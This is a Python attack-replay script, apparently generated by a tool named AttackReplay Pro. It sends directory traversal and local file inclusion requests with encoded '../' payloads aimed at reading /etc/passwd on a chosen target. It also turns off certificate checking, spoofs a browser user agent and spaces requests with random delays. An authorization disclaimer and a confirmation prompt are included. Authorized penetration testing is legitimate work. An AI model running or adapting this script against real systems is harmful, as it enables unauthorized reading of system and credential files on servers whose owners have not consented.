#!/usr/bin/env python3
"""
Batch Attack Simulation Script
Generated by AttackReplay Pro

DISCLAIMER: This script is for authorized security testing only.
Only use on systems you own or have explicit permission to test.
"""

import requests
import time
import random
import sys
from datetime import datetime
from urllib.parse import urlparse

class BatchAttackSimulator:
    def __init__(self, target_url):
        self.target_url = target_url.rstrip('/')
        self.session = requests.Session()
        self.results = []
        
        # Set up session
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Connection": "keep-alive"
        })
    
    def run_attack_sequence(self):
        """Run all detected attacks in sequence."""
        attacks = [
            {'type': 'Directory Traversal', 'path': '/view', 'query': 'file=%2e%2e%2f%2e%2e%2fetc/passwd', 'method': 'GET', 'payload': '%2e%2e%2f'},
            {'type': 'Local File Inclusion', 'path': '/view', 'query': 'file=%2e%2e%2f%2e%2e%2fetc/passwd', 'method': 'GET', 'payload': '%2e%2e%2f'},
        ]
        
        print(f"🎯 Starting batch attack simulation with {len(attacks)} attacks")
        print(f"Target: {self.target_url}")
        print("=" * 70)
        
        for i, attack in enumerate(attacks, 1):
            print(f"\n[{i}/{len(attacks)}] Executing {attack['type']} attack...")
            
            try:
                # Construct URL
                if attack['query']:
                    full_url = f"{self.target_url}{attack['path']}?{attack['query']}"
                else:
                    full_url = f"{self.target_url}{attack['path']}"
                
                print(f"  URL: {full_url}")
                print(f"  Method: {attack['method']}")
                
                # Execute attack
                start_time = time.time()
                if attack['method'].upper() == 'GET':
                    response = self.session.get(full_url, timeout=10, verify=False)
                elif attack['method'].upper() == 'POST':
                    response = self.session.post(full_url, timeout=10, verify=False)
                else:
                    response = self.session.request(attack['method'], full_url, timeout=10, verify=False)
                
                end_time = time.time()
                
                # Record result
                result = {
                    'attack_type': attack['type'],
                    'status_code': response.status_code,
                    'response_time': end_time - start_time,
                    'content_length': len(response.content),
                    'success': response.status_code < 400
                }
                self.results.append(result)
                
                print(f"  ✅ Status: {response.status_code} | Time: {result['response_time']:.2f}s | Size: {result['content_length']} bytes")
                
            except Exception as e:
                print(f"  ❌ Failed: {e}")
                self.results.append({
                    'attack_type': attack['type'],
                    'status_code': 0,
                    'response_time': 0,
                    'content_length': 0,
                    'success': False,
                    'error': str(e)
                })
            
            # Random delay between attacks
            if i < len(attacks):
                delay = random.uniform(0.5, 2.0)
                time.sleep(delay)
        
        self.print_summary()
    
    def print_summary(self):
        """Print attack summary."""
        print("\n" + "=" * 70)
        print("📊 BATCH ATTACK SUMMARY")
        print("=" * 70)
        
        total_attacks = len(self.results)
        successful_attacks = sum(1 for r in self.results if r['success'])
        failed_attacks = total_attacks - successful_attacks
        
        print(f"Total Attacks: {total_attacks}")
        print(f"Successful: {successful_attacks}")
        print(f"Failed: {failed_attacks}")
        print(f"Success Rate: {(successful_attacks/total_attacks)*100:.1f}%")
        
        print("\nAttack Results:")
        for result in self.results:
            status = "✅" if result['success'] else "❌"
            print(f"  {status} {result['attack_type']}: Status {result['status_code']}")

def main():
    # Configuration - CHANGE THIS
    TARGET_URL = "http://your-target-website.com"  # ⚠️ CHANGE THIS
    
    if TARGET_URL == "http://your-target-website.com":
        print("❌ ERROR: Please change TARGET_URL to your actual target!")
        sys.exit(1)
    
    # Confirmation
    print("🎯 AttackReplay Pro - Batch Attack Simulator")
    print(f"Target: {TARGET_URL}")
    confirm = input("\n⚠️  Are you authorized to test this target? (yes/no): ").lower()
    if confirm != 'yes':
        print("❌ Attack cancelled.")
        sys.exit(1)
    
    # Run attacks
    simulator = BatchAttackSimulator(TARGET_URL)
    simulator.run_attack_sequence()

if __name__ == "__main__":
    main()
